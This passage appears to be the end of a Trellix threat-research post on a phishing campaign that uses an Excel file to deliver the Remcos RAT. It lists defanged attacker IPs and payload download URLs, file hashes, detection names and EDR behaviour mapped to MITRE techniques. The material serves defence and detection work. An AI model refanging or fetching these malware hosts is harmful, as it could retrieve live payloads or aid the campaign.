76[.]76[.]21[.]164
178[.]237[.]33[.]50
192[.]3[.]176[.]174
URLS
hxxp[:]//geoplugin[.]net/json.gp
hxxps[:]//slug[.]vercel[.]app/wyiqkf
hxxps[:]//host[.]colocrossing[.]com
hxxp[:]//45[.]90[.]89[.]50/100/JNN.txt
hxxp[:]//45.90.89.50/xampp/ien/INET.hta
hxxp[:]//servidorwindows[.]ddns[.]com[.]br/Files/vbs.jpeg
hxxp[:]//45[.]90[.]89[.]50/100/instantflowercaseneedbeautygirlsherealways.gIF
HASHES
e522d386b90054af950c456a9c108fd9 (SWT20240506_12082.xls)
accdfe7a24bcb621a1dade4ab39eddb2
(f681e8f26091a2a5ed40f477340a06140bbee4fa91eb5fe5a71b40da43affb46.hta)
62069dcfee1598a0df9d8caed54566f7 (vbs.jpeg)
42e59390d88ec14ab5a14873cce70344
(instantflowercaseneedbeautygirlsherealways[1].gz)
b45300468d82291d84ff009c8974c3f2 (JNN.txt)
b135d5a0f51ad3be647c1878a8cc5309 (Remcos)
TRELLIX ENS DETECTIONS
Hash (MD5) Detection Name e522d386b90054af950c456a9c108fd9 XLS/Agent.a
accdfe7a24bcb621a1dade4ab39eddb2 HTA/Agent.g 62069dcfee1598a0df9d8caed54566f7
Generic agent.z 42e59390d88ec14ab5a14873cce70344 VBS/Agent.lr
b45300468d82291d84ff009c8974c3f2 OBFUSCATED/Trojan.c
b135d5a0f51ad3be647c1878a8cc5309 Remcos-FDQO!B135D5A0F51A (Detected w/ current
DATs)
TRELLIX EDR DETECTIONS
1. MD5: 42e59390d88ec14ab5a14873cce70344
(instantflowercaseneedbeautygirlsherealways[1].gz)
Description Tactic TID VBScript/JavaScript interpreter started suspicious
PowerShell process ['Execution'] ['T1059.005'] Downloaded content using
PowerShell with suspicious command ['Execution', 'CommandAndControl']
['T1059.001', 'T1105', 'T1071'] Download content from third-party website with
PowerShell ['Execution', 'CommandAndControl'] ['T1059.001', 'T1105', 'T1071']
Invoked methods from .Net Assemblies via PowerShell and Reflection API
['Execution', 'DefenseEvasion'] ['T1059.001', 'T1620'] Detected suspicious
binary doing system discovery ['Execution', 'Discovery'] ['T1106', 'T1082']
Suspicious process accessed desktop.ini file ['Persistence',
'PrivilegeEscalation'] ['T1547.009'] Executed PowerShell with very long command
line ['Execution'] ['T1059.001']
2. MD5: accdfe7a24bcb621a1dade4ab39eddb2
(f681e8f26091a2a5ed40f477340a06140bbee4fa91eb5fe5a71b40da43affb46.hta)
Description Tactic TID
System Language Discovery via API
['Execution', 'Discovery']
['T1106', 'T1614.001']
Downloaded script file from third-party website through PowerShell
['Execution', 'CommandAndControl']
['T1059.001', 'T1105', 'T1071']
Executed Obfuscated PowerShell Base64String command
['Execution', 'DefenseEvasion']
['T1059.001', 'T1027', 'T1140']
Discovered user information using PowerShell environment variables
['Discovery', 'Execution']
['T1033', 'T1059.001', 'T1087.001', 'T1083']
Executed Windows-native binary mshta.exe
['DefenseEvasion']
['T1218.005']
Windows-native binary mshta.exe has executed an admin tool
['DefenseEvasion']
['T1218.005']
Executed an HTML Application (HTA) file stored in system
['DefenseEvasion']
['T1218.005']
MSHTA acting as VBScript interpreter
['DefenseEvasion', 'Execution']
['T1218.005', 'T1059.005']
Executed Invoke-Expression (IEX) PowerShell cmdlet
['Execution']
['T1059.001']
RECENT NEWS
* Oct 15, 2024
Trellix Finds Nearly Half of CISOs to Exit the Role Without Industry Action
* Oct 3, 2024
Trellix CEO Rallies the Industry to Support CISO Role
* Sep 10, 2024
Trellix Integrates Email Security with Data Loss Prevention
* Aug 21, 2024
U.S. Department of Defense Chooses Trellix to Protect Millions of Email
Systems from Zero-Day Threats
* Aug 14, 2024
Magenta Buyer LLC Raises $400 Million of New Capital
RECENT STORIES
* 23. Okt. 2024
CISOs at the Crossroads: A Call for Support and Change
* 17. Okt. 2024
Shrinking the Gray with Modern Endpoint Security
* 15. Okt. 2024
Speeding Threat Detection and Automating Investigations with GenAI
* 3. Okt. 2024
No Alert Left Behind - Get to 100% with GenAI
* 2. Okt. 2024
Cyber Threats Targeting the US Government During the Democratic National
Convention
THE LATEST FROM OUR NEWSROOM
Blogs | Perspectives
TRELLIX CHALLENGES THE STATUS QUO WITH RESPONSIBLE SECURITY
By Ashok Banerjee and Joe Malenfant · October 1, 2024
How Trellix keeps you secure, because there is no one-size fits all approach for
endpoint security.
Read the Article
Blogs | Perspectives
A CISO’S PERSPECTIVE ON THE CROWDSTRIKE OUTAGE
By Harold Rivas · September 23, 2024
Trellix CISO Harold Rivas offers guidance on how CISOs can evaluate their
technologies and rebuild trust and resilience after the CrowdStrike outage.
Read the Article
Blogs | Research
UNVEILING A STEALTHY EXCEL ATTACK DELIVERING FILELESS REMCOS RAT
By Trishaan Kalra · September 11, 2024
This blog analyzes a recent malware campaign using a benign-looking Excel file
in a phishing attack, exploiting CVE-2017-0199 to run code in Microsoft Office
and WordPad.
Read the Article
FEATURED CONTENT
GET THE LATEST
We’re no strangers to cybersecurity. But we are a new company.
Stay up to date as we evolve.
Please enter a valid email address.
Please enter a business email address
Submit
Zero spam. Unsubscribe at any time.
--------------------------------------------------------------------------------
Platform Capabilities The Trellix Platform Trellix Wise Engine
Product Categories Endpoint Security Data Security Network Security Threat
Intelligence Email Security Cloud Security SIEM View All Products
About Trellix Why Trellix? About Us Leadership Partners Careers at Trellix
Corporate Social Responsibility
News and Events Newsroom Press Releases Blogs Webinars Events
Support Support Product Documentation Downloads Product End-of-Life
Communication Preferences
Resources Resource Library Advanced Research Center Training and Education
Security Awareness Trust Center Self-Guided Tours
Connect with Trellix Contact Us Request a Demo
Trellix Store Shop Online
Copyright © 2024 Musarubra US LLC | Privacy | Legal | Terms of Service
SEARCH TIPS
Be concise and specific:
Wrong: I want to learn how to migrate to Trellix Endpoint Security
Right: Trellix Endpoint Security migration
Use quotation marks to find a specific phrase:
“migrate to Trellix Endpoint security”
Use sets of quotation marks to search for multiple queries:
“endpoint security” “Windows”
Punctuation and special characters are ignored:
Avoid these characters: `, ~, :, @, #, $, %, ^, &, =, +, <, >, (, )
The search engine is not case sensitive:
Endpoint security, endpoint security, and ENDPOINT SECURITY will all yield the
same results.
Close